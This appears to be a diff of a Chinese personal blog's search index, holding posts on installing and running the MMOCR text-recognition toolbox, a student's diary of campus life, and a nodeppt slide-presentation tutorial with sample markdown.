    # "-e" 会以可编辑的方式安装该代码库,你对该代码库所作的任何更改都会立即生效

    推理

    ​快速开始:

    from mmocr.apis import MMOCRInferencer
    ocr = MMOCRInferencer(det='DBNet', rec='CRNN')
    • 要用 MMOCR 的预训练模型进行推理,只需要把它的名字传给参数 det,权重将自动从 OpenMMLab 的模型库中下载和加载。此处记录了 MMOCR 中可以通过该方法初始化的所有模型。

      MMOCRInferencer(det='DBNet')
    • 要加载自定义的配置和权重,你可以把配置文件的路径传给 det,把权重的路径传给 det_weights

      MMOCRInferencer(det='path/to/dbnet_config.py', det_weights='path/to/dbnet.pth')
    • 默认情况下,MMEngine 会在训练模型时自动将配置文件转储到权重文件中。如果你有一个在 MMEngine 上训练的权重,你也可以将权重文件的路径传递给 weights,而不需要指定 model

      # 如果无法在权重中找到配置文件,则会引发错误
      inferencer = TextDetInferencer(weights='path/to/dbnet.pth')
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    Downloading: "https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    100%|███████████████████████████████████████████████████████████████████████████████| 107M/107M [00:17<00:00, 6.50MB/s]
    05/30 10:22:37 - mmengine - WARNING - Failed to search registry with scope "mmocr" in the "function" registry tree. As a workaround, the current "function" registry in "mmengine" is used to build instance. This may cause unexpected failure when running the built modules. Please check whether "mmocr" is a correct scope, or whether the registry is initialized.
    C:\Users\XXX\.conda\envs\openmmlab\lib\site-packages\mmengine\visualization\visualizer.py:196: UserWarning: Failed to add <class 'mmengine.visualization.vis_backend.LocalVisBackend'>, please provide the `save_dir` argument.
    warnings.warn(f'Failed to add {vis_backend.__class__}, '
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    Downloading: "https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    100%|█████████████████████████████████████████████████████████████████████████████| 91.8M/91.8M [00:13<00:00, 6.96MB/s]
    The model and loaded state dict do not match exactly

    unexpected key in source state_dict: data_preprocessor.mean, data_preprocessor.std
    ocr('demo/demo_text_ocr.jpg', show=True, print_result=True)

    webp

    ​看来它默认不支持中文和弯曲文本……

    webp

    ]]>
    + 配置

    资源

    正文

    Abstract

    ​我们提出了 MMOCR——一个开源工具箱,它提供了覆盖文本检测与识别及其下游任务(如命名实体识别和关键信息提取)的完整管线。MMOCR 实现了 14 种最先进的算法,比我们迄今所知的所有现有开源 OCR 项目都多。为了促进文本识别相关问题的未来研究和工业应用,我们还提供了大量预训练模型和详细的基准测试,以便深入了解文本检测、识别和理解的性能。MMOCR 在 https://github.com/open-mmlab/mmocr 上公开发布。

    1 INTRODUCTION

    ​不同的方法使用不同的训练数据集、优化策略(例如优化器、学习率调度、训练轮数、预训练权重和数据增强管线)和网络设计(例如网络架构和损失函数)。为了涵盖各种模型所用组件的多样性,我们提出了 MMOCR 工具箱,在统一框架中覆盖了近来流行的文本检测、识别和理解方法。截至目前,工具箱实现了七种文本检测方法、五种文本识别方法、一种关键信息提取方法和一种命名实体识别方法。整合各种算法提高了代码的可复用性,从而大大简化了算法的实现。此外,统一框架允许公平地比较不同方法,并可以方便地研究其关键有效组件。据我们所知,MMOCR 在各类开源工具箱中重新实现了最多的基于深度学习的文本检测和识别方法,我们认为这将促进未来文本检测、识别和理解的研究。

    ​MMOCR 在 Apache-2.0 许可证下于 https://github.com/open-mmlab/mmocr 公开发布。该仓库包含所有源代码和详细文档,包括安装说明、数据集准备脚本、API 文档、模型库、教程和用户手册。MMOCR 重新实现了十多种最先进的文本检测、识别和理解算法,并提供了在流行学术数据集上训练的大量基准和模型。为了支持多语言 OCR 任务,MMOCR 还发布了在工业数据集上训练的中文文本识别模型。除了(分布式)训练和测试脚本,MMOCR 还提供了一套丰富的实用工具,涵盖可视化、演示和部署。MMOCR 提供的模型很容易转换为 ONNX,后者得到了部署框架和硬件设备的广泛支持。因此,它对学术研究人员和工业开发人员都很有用。

    • 文本检测。文本检测旨在将文本实例的边界框进行定位。最近的研究重点已转移到具有挑战性的 arbitrary-shaped text detection

      • Mask R-CNN 可用于检测文本,由于基于矩形的 ROI 建议,它可能无法检测弯曲和密集的文本。
      • 另一方面,TextSnake 用一系列有序的重叠圆盘来描述文本实例。
      • PSENet 提出了一种渐进式规模扩展网络,可以区分位置接近的弯曲文本实例。
      • DB 通过向分割网络提出可微分二值化函数来简化场景文本分割的二值化后处理,其中图像概率图的每个点处的阈值可以自适应地预测。
    • 文本识别。文本识别由于能够从文本图像中提取丰富的语义信息而受到越来越多的关注。

      • 卷积递归神经网络(CRNN)使用端到端的可训练神经网络,该网络由用于特征提取的深度卷积神经网络(DCNN),用于顺序预测的递归神经网络(RNN)和用于产生标签序列的转录层组成。
      • RobustScanner 能够通过使用新的位置增强分支和动态融合模块来识别无上下文文本,从而减轻随机文本图像的误识别问题。
      • 已努力将不规则文本输入纠正为与典型文本识别器兼容的规则文本。例如,薄板样条(TPS)变换在深度神经网络中使用,该深度神经网络结合了空间 Transformer 网络(STN)和序列识别网络(SRN),以在将弯曲和透视文本输入 SRN 之前纠正它们。
    • 关键信息提取。非结构化文档图像(如收据或信用票据)的关键信息提取(KIE)最主要用于办公自动化任务,包括高效存档和合规性检查。传统的方法,如模板匹配,不能很好地推广看不见的模板的文档。提出了几种模型来解决泛化问题。

      • 例如,CloudScan 使用 NER 来分析整个发票的连接一维文本序列。
      • Chargrid 将每个文档页面编码为一个二维字符网格进行语义分割,但由于它只覆盖了小邻域的二维空间布局信息,不能充分利用文本区域之间的非局部、远距离的空间关系。
      • 最近,已经开发了一种端到端的空间双模态图推理(SDMG-R)模型,该模型对文本识别错误特别鲁棒。它将非结构化文档图像建模为空间双模态图,图节点作为检测到的文本框,图边缘作为节点之间的空间关系。
    • 命名实体识别。命名实体识别(NER)旨在定位命名实体并将其分类为预定义的类别,例如个人或组织的名称。它们基于双向 LSTM 或条件随机场。

    webp

    • 开源 OCR 工具箱。多年来,已经开发了几种开源 OCR 工具箱,以满足学术界和行业的日益增长的需求。
      • Tesseract 是开源 OCR 工具箱的先驱。它于 2005 年公开发布,并提供了从图像中提取印刷体文本的 CLI 工具。最初,它遵循传统的分步管线,包括连通组件分析、文本行查找、基线拟合、等宽字符检测与切分、按比例间距的单词查找和单词识别。现在,它支持基于 LSTM 的 OCR 引擎,并支持 100 多种语言。
      • 基于深度学习的开源 OCR 工具箱 EasyOCR 于最近发布。它为工业用户提供了简单的 API,并支持 80 多种语言。它实现了 CRAFT 检测器和 CRNN 识别器。但是,它仅用于推理,不支持模型训练。
      • chineseocr 是另一个流行的开源 OCR 工具箱。它分别使用 YOLOv3 和 CRNN 进行文本检测和识别,并使用 OpenCV DNN 进行深度模型推理。
      • 相比之下,chineseocr_lite 提供了轻量的中文检测和识别工具箱,它使用 DB 检测文本、CRNN 识别文本。它提供了基于 NCNN 和 TNN 的前向推理,并且可以轻松部署在 Windows、Linux 和 Android 等多个平台上。
      • PaddleOCR 是基于 PaddlePaddle 的实用开源 OCR 工具箱,可以部署在 Linux、Windows 和 macOS 等多个平台上。目前,它支持 80 多种语言,并实现了三种文本检测方法(EAST、DB 和 SAST)、五种识别方法(CRNN、Rosetta、STAR-Net、RARE 和 SRN),以及一种端到端的文本检测识别方法(PGNet)。

    3 TEXT DETECTION STUDIES

    ​深度学习模型的性能受许多重要因素影响。在本节中,我们研究了网络架构的主干和颈部。我们在不同基于分割的文本检测方法之间交换上述组件,以衡量性能和计算复杂度的影响。

    webp

    Backbone。ResNet18 和 ResNet50 在文本检测方法中常被使用。为了实际应用,我们还介绍了一种适用于 GPU 的轻量级主干 ddrnet23-slim。表中比较了将 ResNet18、ResNet50 和 ddrnet23-slim 插入 PSENet、PAN 和 DB 中的 FLOPs 和 H-mean。结果显示,ddrnet23-slim 的表现略逊于 ResNet18 和 ResNet50,其 FLOPs 分别仅为 ResNet18 和 ResNet50 的 45% 和 21%。

    webp

    Neck。PSENet、PAN 和 DB 提出了不同的类似 FPN 的颈部结构来融合多尺度特征。我们在表中的实验结果显示,PSENet 中提出的 FPNF 可以在 PSENet 和 DB 中达到最佳的 H-mean。然而,它的 FLOPs 明显高于 DB 中提出的 PFNC 和 PAN 中提出的 FPEM_FFM。相比之下,FPEM_FFM 在 PAN 中拥有最低的 FLOPs,并且达到最佳的 H-mean。

    4 CONCLUSIONS

    ​我们已经公开发布了 MMOCR,这是一个涵盖文本检测、识别和理解的综合工具包。MMOCR 已经实现了 14 种最先进的算法,比所有现有的开源 OCR 项目都要多。此外,它提供了广泛的训练模型、基准测试、详细的文档和实用工具。在本报告中,我们广泛地将 MMOCR 与其他开源 OCR 项目进行了比较。此外,我们还引入了一种适用于 GPU 的轻量级主干 ddrnet23-slim,并对主干和颈部的影响进行了认真研究,以指导工业应用中的检测性能和计算复杂度。

    代码

    安装

    ​创建虚拟环境:

    conda create -n open-mmlab python=3.8
    conda activate open-mmlab

    ​离线安装 pytorch 和 torchvision:

    pip install torch-1.13.1+cu117-cp38-cp38-win_amd64.whl
    pip install torchvision-0.14.1+cu117-cp38-cp38-win_amd64.whl

    ​使用 MIM 安装 MMEngine、MMCV、MMDetection:

    pip install -U openmim
    mim install mmengine
    mim install mmcv
    mim install mmdet

    ​从 open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 获取代码,进入该文件夹后执行:

    pip install -v -e .
    # "-v" 会让安装过程产生更详细的输出
    # "-e" 会以可编辑的方式安装该代码库,你对该代码库所作的任何更改都会立即生效

    推理

    ​快速开始:

    from mmocr.apis import MMOCRInferencer
    ocr = MMOCRInferencer(det='DBNet', rec='CRNN')
    • 要用 MMOCR 的预训练模型进行推理,只需要把它的名字传给参数 det,权重将自动从 OpenMMLab 的模型库中下载和加载。此处记录了 MMOCR 中可以通过该方法初始化的所有模型。

      MMOCRInferencer(det='DBNet')
    • 要加载自定义的配置和权重,你可以把配置文件的路径传给 det,把权重的路径传给 det_weights

      MMOCRInferencer(det='path/to/dbnet_config.py', det_weights='path/to/dbnet.pth')
    • 默认情况下,MMEngine 会在训练模型时自动将配置文件转储到权重文件中。如果你有一个在 MMEngine 上训练的权重,你也可以将权重文件的路径传递给 weights,而不需要指定 model

      # 如果无法在权重中找到配置文件,则会引发错误
      inferencer = TextDetInferencer(weights='path/to/dbnet.pth')
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    Downloading: "https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth
    100%|███████████████████████████████████████████████████████████████████████████████| 107M/107M [00:17<00:00, 6.50MB/s]
    05/30 10:22:37 - mmengine - WARNING - Failed to search registry with scope "mmocr" in the "function" registry tree. As a workaround, the current "function" registry in "mmengine" is used to build instance. This may cause unexpected failure when running the built modules. Please check whether "mmocr" is a correct scope, or whether the registry is initialized.
    C:\Users\XXX\.conda\envs\openmmlab\lib\site-packages\mmengine\visualization\visualizer.py:196: UserWarning: Failed to add <class 'mmengine.visualization.vis_backend.LocalVisBackend'>, please provide the `save_dir` argument.
    warnings.warn(f'Failed to add {vis_backend.__class__}, '
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    Downloading: "https://download.openmmlab.com/mmocr/textrecog/crnn/crnn_mini-vgg_5e_mj/crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth" to C:\Users\XXX/.cache\torch\hub\checkpoints\crnn_mini-vgg_5e_mj_20220826_224120-8afbedbb.pth
    100%|█████████████████████████████████████████████████████████████████████████████| 91.8M/91.8M [00:13<00:00, 6.96MB/s]
    The model and loaded state dict do not match exactly

    unexpected key in source state_dict: data_preprocessor.mean, data_preprocessor.std
    ocr('demo/demo_text_ocr.jpg', show=True, print_result=True)

    webp

    ​看来它默认不支持中文和弯曲文本……

    webp

    ]]>
    @@ -1809,7 +1809,7 @@ /posts/Diary-17-%E9%9B%8F%E8%8D%B7%E6%97%A5%E5%BD%93%E5%8D%88%EF%BC%81/ - 前言

    每日任务

    ​这两周一次都没有出校门……

    ​6.1 和 6.2 这两天屋顶装修,把我的每日任务点拦在了围栏外,只好找个远点的差不多的视角凑合一下了。

    正文

    5.20

    ​由于前一天在北京一阵发疯,凡哥和 77 直接宿舍开躺,而我这天早上居然没有什么身体不适的症状,体力给我练出来了。Go to 实验室 good good study。

    5.23

    ​又是热炸的一天🥵。实验室的空调属实不行!

    我们空调是坏了还是不开了
    坏了吗
    没感觉啊
    小了吧
    31.1 度
    我不能接受
    可能是小了点
    或许可以去图书馆
    我也是这么想的

    ​在开学的第 88 天洗完了第 90 次澡后,决定去图书馆换个学习环境,然后也又又又又又又又又(我也不知道是几个又了😭)要开始备考英语六级了!

    5.24

    ​天气热了,醒得早了。这段时间都是 6:00 左右醒来去实验室,而学校图书馆要 8:00 才开,还得再倒点时差。

    空荡荡

    ​现在是毕业季,准备考研的人也不多,不用特意卡时间,好评!

    ​冀大图书馆的配置还是很不错的,有插座,装修宽敞漂亮(每日夸冀大 1/1)。就是一个学校真的不能把厕所卫生搞清楚吗(每日骂冀大 1/1)?

    ​结果英语写一半突然要去学院楼开会……

    今天(5 月 24 日)上午 10:00 在 C1-535 开班会,评选第 22 期发展对象,全体同学都要参加,请大家互相提醒按时参加@全体成员

    ​本来想直接翘掉的,但是之前答应过一个同学要投她的票,得说到就到。只好再出来……

    毕业快乐!

    ​图书馆前的小广场里已经有了许多穿着毕业服的人,明年今日自己会如何呢?

    ​散会。午休完继续蹲图书馆。

    黑漆漆

    ​下班!

    5.25

    ​这天保定下起了个人觉得不是很大的雨,结果学校里直接内涝……这个基建是不是有点问题?

    5.26

    关某今天有没有时间打球
    阳哥受死😍

    ​周末跟阳哥打个羽毛球运动下。第一把没进入状态 5-11 寄了,后面发现了阳哥的技术弱点,然后他就再也赢不了我了。

    5.27

    图书馆门口

    ​毕业的氛围越来越浓了。

    砍树

    ​冀大突然砍了一堆树,据说要盖新楼了。突然就感觉校园空旷了起来。

    5.30

    盛夏

    ​图书馆门口的小池塘种上了莲花。查了下保定虽然坐拥古莲池和白洋淀,但保定的市花居然不是莲花,而是同北京一样是月季。

    6.1

    PVZ

    这开局牛逼
    6 啊

    ​77 玩起了现在很火的《植物大战僵尸杂交版》,我也凑热闹地去试了试,居然治好了我的电子阳痿。

    6.2

    毕业答辩

    ​师兄师姐要毕业答辩了!去凑个热闹。

    ​虽然导师事先说答辩上的老师都是事先打过招呼的,但答辩的时候有个女老师还是提了一些比较尖锐的问题;有些老师就没咋提论文技术方面的问题,化身列文虎克在文章格式上挑刺;还有个老师还迟到了,绝。中间还有个师兄在上面讲完了他的工作,有个老师提问的时候没发现她拿错了论文,笑死。

    ​看完上半场,撤!最后走个形式大家都过了。

    bbtime

    ]]>
    + 前言

    每日任务

    ​这两周一次都没有出校门……

    ​6.1 和 6.2 这两天屋顶装修,把我的每日任务点拦在了围栏外,只好找个远点的差不多的视角凑合一下了。

    正文

    5.20

    ​由于前一天在北京一阵发疯,凡哥和 77 直接宿舍开躺,而我这天早上居然没有什么身体不适的症状,体力给我练出来了。Go to 实验室 good good study。

    5.23

    ​又是热炸的一天🥵。实验室的空调属实不行!

    我们空调是坏了还是不开了
    坏了吗
    没感觉啊
    小了吧
    31.1 度
    我不能接受
    可能是小了点
    或许可以去图书馆
    我也是这么想的

    ​在开学的第 88 天洗完了第 90 次澡后,决定去图书馆换个学习环境,然后也又又又又又又又又(我也不知道是几个又了😭)要开始备考英语六级了!

    5.24

    ​天气热了,醒得早了。这段时间都是 6:00 左右醒来去实验室,而学校图书馆要 8:00 才开,还得再倒点时差。

    空荡荡

    ​现在是毕业季,准备考研的人也不多,不用特意卡时间,好评!

    ​冀大图书馆的配置还是很不错的,有插座,装修宽敞漂亮(每日夸冀大 1/1)。就是一个学校真的不能把厕所卫生搞清楚吗(每日骂冀大 1/1)?

    ​结果英语写一半突然要去学院楼开会……

    今天(5 月 24 日)上午 10:00 在 C1-535 开班会,评选第 22 期发展对象,全体同学都要参加,请大家互相提醒按时参加@全体成员

    ​本来想直接翘掉的,但是之前答应过一个同学要投她的票,得说到就到。只好再出来……

    毕业快乐!

    ​图书馆前的小广场里已经有了许多穿着毕业服的人,明年今日自己会如何呢?

    ​散会。午休完继续蹲图书馆。

    黑漆漆

    ​下班!

    5.25

    ​这天保定下起了个人觉得不是很大的雨,结果学校里直接内涝……这个基建是不是有点问题?

    5.26

    关某今天有没有时间打球
    阳哥受死😍

    ​周末跟阳哥打个羽毛球运动下。第一把没进入状态 5-11 寄了,后面发现了阳哥的技术弱点,然后他就再也赢不了我了。

    5.27

    图书馆门口

    ​毕业的氛围越来越浓了。

    砍树

    ​冀大突然砍了一堆树,据说要盖新楼了。突然就感觉校园空旷了起来。

    5.30

    盛夏

    ​图书馆门口的小池塘种上了莲花。查了下保定虽然坐拥古莲池和白洋淀,但保定的市花居然不是莲花,而是同北京一样是月季。

    6.1

    PVZ

    这开局牛逼
    6 啊

    ​77 玩起了现在很火的《植物大战僵尸杂交版》,我也凑热闹地去试了试,居然治好了我的电子阳痿。

    6.2

    毕业答辩

    ​师兄师姐要毕业答辩了!去凑个热闹。

    ​虽然导师事先说答辩上的老师都是事先打过招呼的,但答辩的时候有个女老师还是提了一些比较尖锐的问题;有些老师就没咋提论文技术方面的问题,化身列文虎克在文章格式上挑刺;还有个老师还迟到了,绝。中间还有个师兄在上面讲完了他的工作,有个老师提问的时候没发现她拿错了论文,笑死。

    ​看完上半场,撤!最后走个形式大家都过了。

    bbtime

    ]]>
    @@ -1836,7 +1836,7 @@ /posts/Web-nodeppt/ - 看一看

    耍一耍

    链接 / iframe:

    ​一个 #webslides 就是一个幻灯片对象,一个 <section/> 就是一个幻灯片页面,#section-X 表示第 X 页。

    • 快捷键:
      • Page 翻页: ↑/↓/←/→ Space Home End
      • Fullscreen 全屏: F
      • Overview 大纲: -/+
      • Speaker Note 演讲者笔记: N
      • Grid Background 网格背景: Enter

    写一写

    ​新建一个文件夹,打开命令行,安装 nodeppt

    npm install -g nodeppt

    ​由于这个库有点旧,在新的 nodejs 上运行会报错。需要打开对应的 package.json 修改一下内容:

    webp

    ​在 "scripts":{} 下插入 "serve": "SET NODE_OPTIONS=--openssl-legacy-provider",

    ​之后每次执行 nodeppt 的命令前都必须执行:

    set NODE_OPTIONS=--openssl-legacy-provider

    ​回到文件夹,创建一个 index.md,编写如下内容:

    ​至于 nodeppt 中特有的语法,有时间再慢慢研究吧……

    title: nodeppt - 这可能是迄今为止最好的网页版演示库
    speaker: 三水清
    url: https://github.com/ksky521/nodeppt
    js:
    - https://echarts.cdn.apache.org/zh/asset/theme/infographic.js
    plugins:
    - echarts: {theme: infographic}
    - mermaid: {theme: forest}
    - katex

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RainierDawn_EN-AU3730494945_1920x1080.jpg .dark">

    # nodeppt {.text-landing.text-shadow}

    这可能是迄今为止最好的网页版演示库 {.text-intro.animated.fadeInUp.delay-500}

    [:fa-github: Github](https://github.com/ksky521/nodeppt){.button.ghost.animated.flipInX.delay-1200}

    <slide :class="size-30 aligncenter">

    ### Install

    ---

    `npm install -g nodeppt` {.animated.fadeInUp}

    <slide :class="size-40 aligncenter">

    ### Commands

    ---

    ```shell {.animated.fadeInUp}
    # create a new slide with an official template
    $ nodeppt new slide.md

    # create a new slide straight from a github template
    $ nodeppt new slide.md -t username/repo

    # start local sever show slide
    $ nodeppt serve slide.md

    # to build a slide
    $ nodeppt build slide.md
    ```

    <slide class="bg-gradient-r" :class=" size-40 aligncenter" image="https://cn.bing.com/az/hprichbg/rb/WinterLynx_ZH-CN7158207296_1920x1080.jpg .dark">

    ## Demo Contents

    ---

    * Keyboard Shortcuts {.animated.fadeInUp}
    * CSS Syntax {.animated.fadeInUp.delay-400}
    * Background {.animated.fadeInUp.delay-800}
    * Animation {.animated.fadeInUp.delay-1200}
    * Content Position {.animated.fadeInUp.delay-1600}
    * Quotes {.animated.fadeInUp.delay-2s}
    * Plugins\: echarts/mermaid/ketax {.animated.fadeInUp.delay-2400}
    * Others\: Button/Table.. {.animated.fadeInUp.delay-2800}
    * Speaker mode.. {.animated.fadeInUp.delay-3200}

    <slide :class="size-60 aligncenter">

    ## Keyboard Shortcuts

    ---

    - Page\: ↑/↓/←/→ Space Home End
    - Fullscreen\: F
    - Overview\: -/+
    - Speaker Note\: N
    - Grid Background\: Enter

    :::note

    ## Note here

    :::
    <slide :class="size-50">

    ## :fa-heart-o: CSS Syntax

    WebSlides is so easy to understand and love. Baseline\: 8. {.text-intro}

    * :Typography\::{.text-label} .text-landing, .text-subtitle, .text-data, .text-intro...
    * :BG Colors\::{.text-label} .bg-primary, .bg-blue,.bg-apple...
    * :BG Images\::{.text-label} .background, .background-center-bottom...
    * :Sizes\::{.text-label} .size-50, .size-40...
    * :Component\::{.text-label} card, flexblock, gallery...
    * :Animation\::{.text-label} autoplay, animate.css...
    {.description}

    <slide :class="size-50 aligncenter">

    ## Text Classes

    <slide class="aligncenter">

    # Landings {.text-landing}

    `.text-landing`

    <slide class="aligncenter">

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="aligncenter">

    POWERED BY [#WEBSLIDES](https://twitter.com/search?f=tweets&vertical=default&q=%23WebSlides&src=typd) `.text-subtitle` {.text-subtitle}

    # Landings {.text-landing}

    Create a simple web presence. {.text-intro}

    `.text-intro`

    <slide class="bg-black aligncenter" image="https://cn.bing.com/az/hprichbg/rb/RedAntarctica_EN-AU12197122155_1920x1080.jpg">

    # **Landings** {.text-landing.text-shadow}

    `.text-shadow` {.text-intro}

    <slide class="bg-apple aligncenter">

    ## 4,235,678 {.text-data}

    `.text-data`

    <slide>

    Why WebSlides? .text-context {.text-content}

    ## WebSlides is incredibly easy and versatile. The easiest way to make HTML presentations.

    <slide>

    `.text-cols (2 columns)`

    :::div {.text-cols}

    **Why WebSlides?** There are excellent presentation tools out there. WebSlides is about sharing content, essential features, and clean markup. **Each parent &lt;slide&gt;** in the #webslides element is an individual slide.

    **WebSlides help you build a culture of innovation and excellence**. When you're really passionate about your job, you can change the world. How to manage a design-driven organization? Leadership through usefulness, openness, empathy, and good taste.

    :::

    :::flexblock {.metrics}

    :fa-phone:

    Call us at 555.345.6789

    ----

    :fa-twitter:

    @username

    ----

    :fa-envelope:
    Send us an email
    :::

    <slide :class="size-50 aligncenter">

    ## Backgrounds

    <slide>

    ## Corporate Backgrounds

    :::flexblock {.blink.border}

    ## .bg-primary {..bg-primary}

    \#44d

    ---

    ## .bg-secondary {..bg-secondary}

    \#67d

    ---

    ## .bg-light {..bg-light}

    \#edf2f7

    ---

    ## body

    \#f7f9fb

    :::

    ---

    ## General Colors

    :::flexblock {.blink.border}

    ## .bg-black {..bg-black}

    \#111

    ---

    ## .bg-black-blue {..bg-black-blue}

    \#123

    ---

    ## .bg-white {..bg-white}

    \#fff
    :::

    <slide>

    ## Colorful

    :::flexblock {.border.blink}

    ## .bg-red {..bg-red}

    \#c23

    ---

    ## .bg-green {..bg-green}

    \#077

    ---

    ## .bg-blue {..bg-blue}

    \#346

    ---

    ## .bg-purple {..bg-purple}

    \#62b

    :::

    ---

    ### Transparent Backgrounds

    :::flexblock {.border.blink}

    ## .bg-trans-dark {..bg-trans-dark}

    rgba(0, 0, 0, 0.5)

    ---

    ## .bg-trans-light {..bg-trans-light}

    rgba(255, 255, 255, 0.2)

    :::

    <slide class="bg-gradient-h">

    # Gradients

    :::flexblock {.border}

    Horizontal
    `.bg-gradient-h`

    ---

    Radial
    `.bg-gradient-r`

    ---

    Vertical
    `.bg-gradient-v`
    :::

    <slide class="bg-gradient-v aligncenter">

    ## Vertical Gradient

    `.bg-gradient-v`

    <slide class="bg-gradient-r aligncenter">

    ## Radial Gradient

    `.bg-gradient-r`

    <slide class="bg-black" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg'" >

    `.background-video`

    ## **WebSlides is the easiest way to make HTML presentations. Inspire and engage.**

    <slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">

    ## BG Video with Overlay {.text-landing}

    `<slide class="bg-blue aligncenter" video="https://webslides.tv/static/videos/working.mp4 poster='https://webslides.tv/static/images/working.jpg' .dark">` or `.light`

    <slide class="fullscreen bg-blue" youtube=".dark id='_m67JbGjWnc' autoplay loop" :class="aligncenter">

    ## **Youtube Background**

    `<slide youtube=".dark id='_m67JbGjWnc' autoplay loop">`

    <slide image="https://webslides.tv/static/images/iphone-hand.png .right-bottom">

    :::{.content-left}

    ### .background-(position)

    :::flexblock {.specs}
    ::fa-wifi::

    ## Ultra-Fast WiFi

    Simple and secure file sharing.

    ---

    ::fa-battery-full::

    ## All day battery life

    Your battery worries may be over.

    ---

    ::fa-life-ring::

    ## All day battery life

    We'll fix it or if we can't, we'll replace it.

    :::

    <slide :class="size-50 aligncenter">

    ## Components

    <slide :class="size-60">

    ## Shadowbox

    `:::shadowbox`

    ---

    :::shadowbox

    ## We're web people.

    There're excellent presentation tools out there. WebSlides is about telling the story, and sharing it in a beautiful way. Hypertext and clean code as narrative elements.

    ---

    ## Work better, faster.

    Designers, marketers, and journalists can now focus on the content. Simply [choose a demo](https://webslides.tv/demos) and customize it in minutes.

    :::

    <slide :class="size-80">

    :::card

    ## Card

    .card-50.bg-white

    [Unsplash](http://Unsplash.com) is a really cool resource. It is a collection of Creative Commons Zero licensed photos that are really great. {.text-intro}

    - :Role\::{.text-label} Frontend
    - :client\::{.text-label} Acme
    - :year\::{.text-label} 2018
    {.description}

    ---

    ![](https://source.unsplash.com/rCOWMC8qf8A/)

    :::

    <slide class="fullscreen">

    :::card

    ![](https://source.unsplash.com/ALtNa-uKy3M/)

    ---

    ## Bonsai

    Bonsai is a Japanese art form using trees grown in containers — **.fullscreen > .card-50.** {.text-intro}

    Similar practices exist in other cultures, including the Chinese tradition of penjing from which the art originated, and the miniature living landscapes of Vietnamese hòn non bộ.

    :::

    <slide class="aligncenter">

    ## **Flexible blocks**

    `:::flexblock` = Flexible blocks with auto-fill and equal height.

    <slide>

    ## Flexblock

    :::flexblock

    ## :fa-bar-chart: Purpose

    Businesses that people love5

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love6

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love7

    ---

    ## :fa-cog: Purpose

    Businesses that people love8

    :::

    ---

    ## Flexblock `{.blink.border}`

    :::flexblock {.blink.border}

    ## :fa-bar-chart: Purpose

    Businesses that people love1

    ---

    ## :fa-bar-chart: Purpose

    Businesses that people love2

    ---

    ## :fa-balance-scale: Purpose

    Businesses that people love3

    ---

    ## :fa-cog: Purpose

    Businesses that people love4

    :::

    <slide>

    ## Flexblock clients

    `{.clients}`

    :::flexblock {.clients}

    ![](https://webslides.tv/static/images/logos/google.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/microsoft.svg) {.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/instagram.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    ---

    ![](https://webslides.tv/static/images/logos/netflix.svg){.blacklogo}

    ### Interfaces

    Collaboration with the Acme team to design their mobile apps.

    :::

    <slide :class="size-70">

    ### Gallery

    `:::gallery`

    :::gallery

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/6anudmpILw4/800x600)

    ## Sam Trololovitz

    Master of nothing

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide :class="size-80">

    ### Gallery overlay

    `:::gallery-overlay`

    :::gallery-overlay

    ![](https://source.unsplash.com/uPGOEbjbVGA/800x600)

    ## Alicia Jiménez

    Founder & CEO

    ---

    ![](https://source.unsplash.com/zhkTCCmD4xI/800x600)

    ## Sam Trololovitz

    CTO

    ---

    ![](https://source.unsplash.com/IFxjDdqK_0U/800x600)

    ## Erin Gustafson

    VP of Design

    :::

    <slide class="bg-red frame">

    :::cta

    ::^\$^40::

    ---

    ## Watch TV shows anytime, anywhere

    .frame.bg-red

    :::


    <slide class="bg-black-blue">

    ## Grid Columns

    :::column

    ### **:fa-line-chart: Design**

    Design for growth. We've built a team of world-class designers, developers, and managers.

    ---

    ### **:fa-film: Videos**

    We connect your audience needs, business goals, and brand values into a strategy.

